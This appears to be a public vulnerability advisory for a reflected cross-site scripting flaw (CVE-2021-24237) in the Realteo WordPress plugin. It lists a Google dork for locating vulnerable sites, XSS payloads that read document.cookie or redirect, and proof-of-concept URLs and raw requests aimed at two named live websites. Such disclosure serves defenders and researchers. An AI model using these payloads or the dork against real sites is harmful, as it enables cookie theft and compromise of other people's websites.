/*!
- # VULNERABILITY: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/realteo/
- # DATE: 2021-03-20
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Purethemes [ https://purethemes.net ]
- # SOFTWARE VERSION: <= 1.2.3
- # SOFTWARE LINK: https://themeforest.net/item/findeo-real-estate-wordpress-theme/20697875
- # CVSS: AV:N/AC:L/PR:N/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24237
*/



### -- [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Realteo plugin through v1.2.3 for WordPress.

[i] Vulnerable parameter(s): ?keyword_search=, ?search_radius=, ?_bedrooms= and ?_bathrooms=.

[i] Theme(s) affected: Findeo by Purethemes [ https://purethemes.net ].



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] --!>" autofocus onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//"

[$] --!>" autofocus onfocus=alert(document.cookie);//"



### -- [ PoC #1 | Unauthenticated Reflected XSS | Search query: ]

[!] https://findeo.realty/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;%20%22%3E

[!] GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;%20%22%3E HTTP/1.1
Host: findeo.realty



### -- [ PoC #2 | Unauthenticated Reflected XSS | Search query: ]

[!] https://flatkotha.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22

[!] GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22 HTTP/1.1
Host: flatkotha.com



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze